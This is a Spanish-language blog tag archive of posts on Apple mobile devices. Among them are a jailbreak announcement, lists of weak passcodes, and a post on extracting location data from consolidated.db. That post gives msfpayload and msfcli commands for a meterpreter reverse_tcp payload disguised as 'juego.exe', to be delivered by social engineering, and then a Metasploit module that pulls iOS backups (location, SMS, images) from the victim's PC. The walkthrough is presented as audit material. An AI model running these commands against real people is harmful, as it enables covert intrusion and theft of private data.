Archivos de Etiquetas: IPhone

Arreglar botón home de tu iPhone / iPod Touch / iPad

Uno de los problemas más comunes que tiene los dispositivos móviles de , es que después de un tiempo considerable de uso el botón empieza a fallar (especialmente si sueles utilizar mucho el modo DFU y realizar tareas poco comunes con él), existen muchas guías en la red que aseguran solucionar el problema, la mas popular de ellas es la de la calibración por software, pero en mi caso ninguna funcionaba, casi me habia acostumbrado ya al Assistive Touch pero hoy gracias a la recomendación de un amigo que tenia el mismo problema, he podido arreglar mi botón home fácilmente y quiero compartir el proceso con ustedes.

Leer más…

Jailbreak a Cualquier iPhone, iPod Touch e iPad

Quienes tenemos un dispositivo móvil de , llámese , o , hace mucho tiempo esperábamos una solución universal para realizar el de nuestros dispositivos sin tener que realizar muchas cosas, ahora Comex miembro del Dev-Team y quien ya nos había regalado alegrías con el “Spirit”, el … ahora nos presenta el JailbreakMe 3.0.

JailbreakMe 3.0 es un revolucionario método para realizar el jailbreak de nuestro dispositivo móvil Apple (iPhone, o iPad) con solo navegar desde el Safari en la pagina (www.jailbreakme.com) podremos liberar todos los siguientes modelos: Leer más…

Las peores Contraseñas para el iPhone, iPod o iPad

Ya hemos visto en nuestra Comunidad DragonJAR las Las Peores 500 Contraseñas de Todos los Tiempos y Las peores Contraseñas en Español, ahora le toca el turno a las  Contraseñas para el , o que gracias al desarrollador de Big Brother Camera Security, Daniel Amatay, quien recogía información anonima sobre las contraseñas utilizadas en su creación, podemos hacernos una idea de los passwords mas utilizados en .

De las 204.508 contraseñas ingresadas en el programa Big Brother Camera Security, la clave 1234 fue utilizada 8.884 veces, lo que la convierte en la peor contraseña para utilizar en dispositivos iOS, seguida de 0000 que aparece 5.246 veces y 2580 que aparece 4.756 veces, el TOP 10 de peores Contraseñas para el iPhone, iPod o iPad es: Leer más…

Ubicando a los dueños de un iPhone o iPad

Hace unos días Pete Warden y Alasdair Allen publicaron una investigación en la que descubrieron un archivo con nombre  en cuyo interior se encuentra almacenado un registro de las ultimas ubicaciones donde estuviéramos con nuestro dispositivo .

La noticia le dió la vuelta al mundo en poco tiempo, logrando que Steve Jobs se pronunciara al respecto y saliera con la ya típica respuesta, “no lo hacemos, nuestra competencia sí”, pero por mucho que Jobs niegue el asunto, es un hecho que el archivo existe y que en él se encuentra un registro de nuestros pasos mientras tenemos nuestro dispositivo en el bolsillo, en este artículo vamos a ver los distintos métodos que tenemos para el archivo Consolidated.db, obtener e interpretar este registro.

La primera herramienta que veremos es iPhone Tracker, publicada por Warden y  Allen junto con su investigación que de momento funciona solo en Mac OS X.

Obteniendo Geoposición de con Tracker

Primero que todo debemos obtener una del iPhone Tracker y para ello tenemos dos opciones

  1. Descargamos el código fuente, lo leemos y compilamos con XCode (recomendada)
  2. Descargar la aplicación compilada y ejecutarla en tu sistema

De cualquiera de las dos formas, cuando ejecutamos la aplicación tenemos algo como esto:

Donde el punto azul es el registro de nuestra  y a medida que aumentamos el zoom de la imagen, tendremos mas detalle de este registro; Como pueden ver, el proceso es bastante sencillo y cualquier persona puede hacerlo si tienen un equipo con Mac OS X.

Pero los usuarios de también tienen varias herramientas para obtener este listado..

Obteniendo Geoposición de iPhone en Windows

Para sacar la posición GPS almacenada en el archivo consolidated.db en sistemas Microsoft Windows tenemos varias opciones, la primera iPhone Tracking for Windows.

Con el que podemos ubicar automáticamente el archivo consolidated.db de nuestro , delimitar las fechas en las que hicimos un recorrido y posicionar en un mapa las ultimas ubicaciones almacenadas por nuestro dispositivo.

La otra opción que tenemos en Windows es iPhoneTrackerWin, que como funcionalidad adicional, permite cargar el archivo consolidated.db de otras fuentes, por lo que si obtenemos el backup de otro iPhone, podemos visualizarlo gráficamente gracias a este software.

Como muchos han dicho ya el archivo consolidated.db es en realidad una base de datos en sqlite por lo que con cualquier FrontEnd de SQLite puedes visualizar la información de este archivo, aunque no gráficamente como las herramientas mencionadas anteriormente.

Obteniendo el Backup del iPhone/ con Metasploit

Si estamos realizando una auditoria de seguridad y sabemos que un funcionario de la organización auditada, cuenta con un dispositivo iOS con 3G (iPad o iPhone), podemos obtener la información de este dispositivo, por medio de un nuevo modulo con nombre apple_ios_backup desarrollado por el propio H.D. Moore, creador de nuestro framework favorito Metasploit.

Debemos tener una sección de meterpreter en el equipo donde tenemos el backup, para ello vamos a generar un binario con el meterpreter y por medio de ingeniería social, lograremos que lo ejecuten en el equipo donde se encuentra el backup.

dragon@bt:~# ./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.13 X > juego.exe

Mientras dejamos a la escucha el handler que recibirá la conexión del ejecutable juego.exe

dragon@bt:~# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.0.13 E

El ejecutable lo podemos empaquetar junto a cualquier otro programa  y lograr que lo corran en el equipo deseado, una vez tenemos una sección meterpreter en la maquina, ejecutamos el modulo de apple_ios_backup para sacar las bases de datos (localización, mensajes sms, imágenes, archivos de preferencias).

meterpreter > run windows/gather/_ios_backup

Si el equipo víctima es un Vista o Windows 7 seguramente no tendrás problemas, pero si el equipo víctima es un Windows XP en español como en mi caso, tendremos que echarle mano al archivo modules/post/windows/gather/apple_ios_backup.rb como seguramente muchas veces te ha tocado hacer y cambiar las rutas para que funcionen en los sistemas XP con idioma español.

			if os =~ /Windows 7|Vista|2008/
				@appdata = '\\AppData\\Roaming'
				@users = drive + '\\Users'
			else
				@appdata = '\\Application Data'
				@users = drive + '\\Documents and Settings'
			end

En la linea 61 cambiamos “\\Application Data” por “\\Datos de programa” y probamos de nuevo consiguiendo que el modulo creado por H.D. Moore funcione sin problemas, obteniendo los backups almacenados en la maquina.

Por último les dejo un vídeo donde Alasdair Allan habla sobre este problema en los dispositivos de Apple.

 

Espero que les sea de utilidad este texto y dejen sus comentarios abajo…

Cuidado con las copias chinas de productos Apple

FE DE ERRATA:
La información contenida en esta noticia realmente se trataba del proyecto final del Master de Seguridad Informática de la Universidad Europea de Madrid, con el que varios estudiantes  pretendían correr un rumor falso en internet y colarlos en varios sitios conocidos.

Como podrán ver lograron su comentido, realmente la noticia fué muy bien elaborada y bastante creíble, se supieron armar de una buena trama (bastante posible por cierto) y caímos bien a fondo en el afán de informar para evitar que otras personas resultaran victimas de este “robo de información”.

En todo caso me alegra que de alguna forma ayudara a graduarse de Master a estos personajes y que la difusión de la falsa noticia concientizara un poco a los poseedores de dispositivos con sobre la seguridad de su sistema, por eso paso a dejar la noticia como estaba, pero poniendo en primer lugar las recomendaciones de seguridad para dispositivos , por que aunque esta noticia en particular fuera falsa, la amenaza de troyanos y malware en esta plataforma si que es real así que debemos protegernos de ella.

Recomendaciones de seguridad para tu dispositivo con Android

1). Instale un buen antivirus en su dispositivo Android, algunas alternativas son:

2). Utilice una buena contraseña

3). Navegue con cuidado, con las mismas precauciones que lo haría si estuviera en un PC

4). NO instale aplicaciones innecesarias en su smartphone y siempre hágalo de repositorios de confianza

5). Realice periódicamente una de seguridad de toda la información que tenga en el dispositivo

6). NO guarde su contraseña dentro de los programas del teléfono (es cómodo pero peligroso)

7). NO abra mensajes de spam

8). Mantenga al día las aplicaciones instaladas y el sistema operativo

 

Los chinos copian cualquier cosa y algunas veces lo hacen realmente bien, tanto que muchos sentimos temor a la hora de encargarle a un familiar la compra de un producto , por que muy a menudo en vez de comprar el compraran el ; Pero ahora ademas de este temor debemos preocuparnos de otra cosa mas importante…. nuestra información.

Me ha llegado un correo de Luis Argente Castro un ingeniero que aunque le apasionan los productos de la manzana, le parecen bastante costosos y escribe en su blog “Me pone un Mac? De los baratos si puede ser…” reviews de las alternativas chinas a estos productos, como era de esperarse Castro en vez de comprar la famosa tableta de Apple el iPad, decidió comprar una de sus copias chinas llamada ePad. Leer más…

Recuperar el Codigo (Contraseña) de iPhone, iPod Touch o iPad

Una de las principales barreras que protege la seguridad de nuestra información en los dispositivos móviles de (,,) es el código de seguridad que debemos ingresar para poder acceder a nuestro dispositivo, ya sea para sincronizarlo, sacar información o ejecutar las aplicaciones instaladas, siempre es necesario ingresar este código de seguridad para poder realizar estos procesos.

Pero… como todo sistema donde el usuario debe registrar una secuencia de caracteres o números, para volver a introducirlos como credenciales de acceso, es normal que muchos de ellos olviden el código de 4 dígitos que deben proporcionar y no puedan acceder a la información almacenada en su Gadget. En este articulo veremos algunas de las opciones que tenemos para poder o este código de seguridad y como fortalecer un poco esta medida de seguridad. Leer más…

Descargar Firmware (iOS) para iPhone, iPod Touch, iPad y Apple TV

Todo poseedor de un dispositivo móvil de , ha tenido que buscar alguna vez el de su equipo para realizar cualquier modificación en el (, actualizar sin costo, etc…), como se lo difícil que es encontrar enlaces validos para descargar la versión especifica que deseas el , les dejo la siguiente lista para que los tengas a la mano siempre. Leer más…

Importar Musica del iPhone o iPod Touch al Disco Duro

El procedimiento normal para ingresar música a nuestro o es integrarla al iTunes y luego sincronizando la con nuestro dispositivo, pero… ¿que pasa si queremos hacer el procedimiento inverso?, hay varias razones por las que querríamos hacer esto, abajo enumerare solo algunas de ellas:

Leer más…